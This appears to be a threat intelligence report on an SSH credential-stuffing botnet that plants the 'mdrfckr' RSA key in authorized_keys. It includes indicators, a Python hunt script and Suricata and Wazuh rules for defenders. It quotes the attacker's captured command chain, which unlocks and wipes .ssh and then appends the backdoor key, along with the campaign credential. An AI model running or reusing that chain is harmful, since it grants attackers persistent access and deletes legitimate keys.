TLP:CLEAR HIGH ACTIVE

345gs5662d34 / mdrfckr — Credential Stuffing + SSH Key Campaign

Published 2026-06-24 · Source: distributed honeypot fleet · Confidence: HIGH

610K+ credential attempts · 7,900 unique source IPs · 258K SSH key injections · 30d active window

Executive Summary

Over a 30-day window (2026-05-25 through 2026-06-24), sensors observed a coordinated two-phase campaign combining mass credential stuffing with SSH authorized_keys persistence. The campaign uses the credential 345gs5662d34 as both username and password, attempting 610,000+ logins across 7,900 unique source IPs. Upon successful login, the attacker injects a single hardcoded RSA SSH key (comment: mdrfckr) into ~/.ssh/authorized_keys, establishing persistent backdoor access.

The credential stuffing and key injection are performed by the same botnet — the top IPs participate in both phases with near-identical event counts. The campaign is remarkable for its scale (7,900 IPs), its single-credential approach (one password across 7+ usernames), and its awareness of Linux hardening (the chattr -ia pre-step to remove immutable attributes before modifying the SSH directory).

Threat Actor Profile

| Attribute | Assessment |
| --- | --- |
| Campaign name | 345gs5662d34 / mdrfckr (credential + key comment) |
| Type | Coordinated credential stuffing botnet with SSH key persistence |
| Sophistication | Medium — large botnet, single credential, but includes chattr hardening bypass |
| Intent | Persistent SSH access via authorized_keys for future exploitation |
| Botnet size | ~7,900 unique IPs, globally distributed |
| First observed | 2026-05-25 |
| Last observed | 2026-06-24 (active) |

Phase 1 — Credential Stuffing

The campaign uses the credential 345gs5662d34 as both username and password, and also pairs it with common system usernames. The credential appears programmatically generated — possibly a default password from a specific IoT firmware or a botnet credential rotation token.

Credential Distribution

| Username | Password | Attempts | Unique IPs |
| --- | --- | --- | --- |
| 345gs5662d34 | 345gs5662d34 | 353,609 | 7,887 |
| root | 345gs5662d34 | 257,304 | 7,551 |
| ubuntu | 345gs5662d34 | 21,089 | 4,759 |
| admin | 345gs5662d34 | 15,368 | 4,023 |
| user | 345gs5662d34 | 8,176 | 3,172 |
| test | 345gs5662d34 | 6,627 | 2,871 |
| ftpuser | 345gs5662d34 | 4,793 | 2,406 |

Top Participating Botnet IPs

| IP | Credential attempts | Honeypots hit | First seen | Last seen |
| --- | --- | --- | --- | --- |
| 102.88.137.80 | 1,059 | 24 | 2026-05-25 | 2026-06-24 |
| 20.203.42.204 | 991 | 36 (all) | 2026-05-25 | 2026-06-10 |
| 182.93.50.90 | 967 | 34 | 2026-05-26 | 2026-06-24 |
| 220.247.224.226 | 662 | 33 | 2026-05-25 | 2026-06-24 |
| 182.93.7.194 | 555 | 34 | 2026-05-25 | 2026-06-24 |
| 96.78.175.36 | 504 | 34 | 2026-05-25 | 2026-06-23 |
| 102.88.137.213 | 500 | 36 (all) | 2026-05-26 | 2026-06-24 |
| 103.98.176.164 | 495 | 35 | 2026-05-25 | 2026-06-17 |
| 31.179.197.26 | 481 | 35 | 2026-05-25 | 2026-06-18 |
| 41.82.50.218 | 481 | 28 | 2026-06-01 | 2026-06-24 |

Phase 2 — SSH Key Injection

Upon successful login, the attacker executes a two-command sequence to install a persistent SSH backdoor key. The attack is notable for its chattr -ia pre-step, which removes the immutable and append-only attributes that Linux hardening guides recommend setting on the ~/.ssh directory. Clearing those attributes requires CAP_LINUX_IMMUTABLE, so the pre-step only takes effect in root sessions; on unprivileged accounts it fails and the rest of the chain runs regardless.

Attack Sequence (from 102.88.137.80)

# Step 1: Remove immutable attributes (unlock .ssh directory)
cd ~; chattr -ia .ssh; lockr -ia .ssh

# Step 2: Replace authorized_keys with the mdrfckr RSA key
cd ~ && rm -rf .ssh && mkdir .ssh && echo \
  "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr" \
  >>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

The key injection was observed 258,551 times across 7,594 unique IPs — a near-1:1 match with the credential stuffing IPs, confirming this is a single coordinated campaign.

Campaign Cross-Reference

The same IPs perform both credential stuffing and key injection, confirming a single operation:

| IP | Credential attempts | SSH key injections | Ratio |
| --- | --- | --- | --- |
| 102.88.137.80 | 1,059 | 1,033 | 0.98 |
| 182.93.50.90 | 967 | 953 | 0.99 |
| 20.203.42.204 | 991 | 826 | 0.83 |
| 182.93.7.194 | 555 | 536 | 0.97 |

Other Notable Credentials in the Same Window

Several other credential pairs appeared at high volume during the same 30-day period, suggesting either parallel campaigns or additional credentials deployed by the same botnet:

| Credential | Attempts | Unique IPs | Notes |
| --- | --- | --- | --- |
| admin / admin | 39,174 | 2,001 | Generic default credential |
| support / support | 22,250 | 495 | Support account default |
| solana / solana | 9,257 | 32 | Crypto-themed — targeted, not botnet |
| ftpuser / J5cmmu=Kyf0-br8CsW | 10,364 | 10 | Targeted FTP credential, 10 IPs only |

MITRE ATT&CK Mapping

| ID | Technique | Evidence |
| --- | --- | --- |
| T1110.001 | Password Guessing | 610K+ attempts with single credential across 7+ usernames |
| T1110.004 | Credential Stuffing | 7,900 unique IPs performing coordinated credential spraying |
| T1098.004 | SSH Authorized Keys | 258K injections of mdrfckr RSA key into authorized_keys |
| T1078 | Valid Accounts | Successful logins enable the key injection phase |
| T1059.004 | Unix Shell | chattr, rm -rf, echo, chmod command chain |
| T1562.001 | Impair Defenses | chattr -ia .ssh removes immutable attributes (hardening bypass) |

Campaign Timeline

| Date | Event |
| --- | --- |
| 2026-05-25 | Campaign begins. Credential 345gs5662d34 first observed. SSH key injections begin same day. |
| 2026-05-25 → ongoing | Continuous daily activity from 7,900 IPs. Top IP 102.88.137.80 hits 24 sensors on day 1. |
| 2026-06-10 | 20.203.42.204 (the only IP to hit all sensors) stops activity after 991 attempts. |
| 2026-06-24 | Campaign still active. Multiple IPs continue credential attempts and key injections. |

Indicators of Compromise

Credential IOC

345gs5662d34 — used as both username and password (primary campaign credential)

SSH Key IOC

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

Command Pattern IOC

cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa ... mdrfckr" >> .ssh/authorized_keys && chmod -R go= ~/.ssh
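Added example for this report (not tooling from the honeypot fleet): a small Python hunt that flags the campaign key in an authorized_keys file by exact blob or by the mdrfckr comment, derives its OpenSSH SHA256 fingerprint for sharing, and checks captured shell lines against the installer chain from the Command Pattern IOC. The key blob and command strings are taken from the IOC sections above; the sample authorized_keys content and the benign ed25519 entry are constructed.

```python
import base64
import hashlib
import re

# Campaign key blob, copied verbatim from the report's SSH Key IOC.
MDRFCKR_BLOB = (
    "AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8"
    "NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpg"
    "LMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WE"
    "QHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTT"
    "WYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw=="
)
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256", "ssh-dss")
# Installer chain from the Command Pattern IOC: unlock .ssh, wipe it, append key, lock perms.
INSTALLER_PATTERNS = [
    re.compile(r"\bchattr\s+-ia\s+\.ssh\b"),
    re.compile(r"\brm\s+-rf\s+\.ssh\b.*\bauthorized_keys\b"),
    re.compile(r"\bauthorized_keys\b.*\bchmod\s+-R\s+go=(\s|$)"),
]


def fingerprint(blob_b64: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 key blob (padding stripped)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def scan_authorized_keys(text: str) -> list[dict]:
    """One finding per entry whose blob or comment matches the campaign key."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        parts = line.split()
        # Skip blanks/comments; tolerate a leading options field such as command="...".
        idx = next((i for i, p in enumerate(parts) if p in KEY_TYPES), None)
        if not parts or parts[0].startswith("#") or idx is None or len(parts) < idx + 2:
            continue
        blob, comment = parts[idx + 1], " ".join(parts[idx + 2:])
        if blob == MDRFCKR_BLOB or comment == "mdrfckr":
            findings.append({"line": lineno, "comment": comment, "exact_blob": blob == MDRFCKR_BLOB,
                             "fingerprint": fingerprint(blob)})
    return findings


def matches_installer(command: str) -> list[str]:
    """Return the installer-chain patterns that a captured shell line triggers."""
    return [p.pattern for p in INSTALLER_PATTERNS if p.search(command)]


# Constructed sample: a benign ed25519 entry (all-zero point) plus the campaign key
# as it lands after the attacker's echo >> .ssh/authorized_keys.
BENIGN_BLOB = base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(32)).decode()
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    f"ssh-ed25519 {BENIGN_BLOB} ops@example.internal",
    f"ssh-rsa {MDRFCKR_BLOB} mdrfckr",
])
```

Feed it `~/.ssh/authorized_keys` from each account on a host that accepted one of the campaign credentials, and run captured shell lines from session logs through `matches_installer` to catch the chain even when the key comment has been changed.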

Network — Top Botnet IPs

102.88.137.80 · 20.203.42.204 · 182.93.50.90 · 220.247.224.226 · 182.93.7.194 · 96.78.175.36 · 102.88.137.213 · 103.98.176.164 · 31.179.197.26 · 41.82.50.218 · 181.188.176.242 · 5.182.83.231 · 176.109.97.11 · 222.232.176.7 · 190.244.39.224

Detection Signatures

Both Suricata rules below match literal strings in TCP payload. On a real SSH service the password and the post-login commands travel inside the encrypted channel, so these rules only fire on cleartext traffic such as the Telnet lures; on production hosts the host-side Wazuh rule is the signal to rely on.

Suricata — 345gs5662d34 Credential in SSH Auth

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 ( \
  msg:"cowrAI 345gs5662d34 credential stuffing campaign"; \
  flow:to_server,established; \
  content:"345gs5662d34"; \
  threshold:type both, track by_src, count 5, seconds 60; \
  classtype:attempted-admin; sid:9003020001; rev:1; \
)

Suricata — mdrfckr SSH Key Injection

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 ( \
  msg:"cowrAI mdrfckr SSH authorized_keys injection"; \
  flow:to_server,established; \
  content:"mdrfckr"; \
  content:"authorized_keys"; distance:0; \
  content:"chattr"; nocase; \
  classtype:trojan-activity; sid:9003020002; rev:1; \
)

OSSEC / Wazuh — authorized_keys Replacement

<rule id="100302" level="12">
  <if_sid>530</if_sid>
  <!-- Single regex: repeated <match> elements are concatenated by the rule loader, not ANDed -->
  <regex>rm -rf \.ssh.*authorized_keys</regex>
  <description>SSH authorized_keys replacement detected (mdrfckr campaign)</description>
</rule>

Collection Methodology

Data collected by a distributed honeypot fleet running SSH/Telnet protocol lures. All login attempts and post-authentication commands were captured at the application layer and ingested into a time-series database for analysis. Credential pairs, source IP addresses, and command sequences were correlated across sensors to identify the two-phase campaign structure.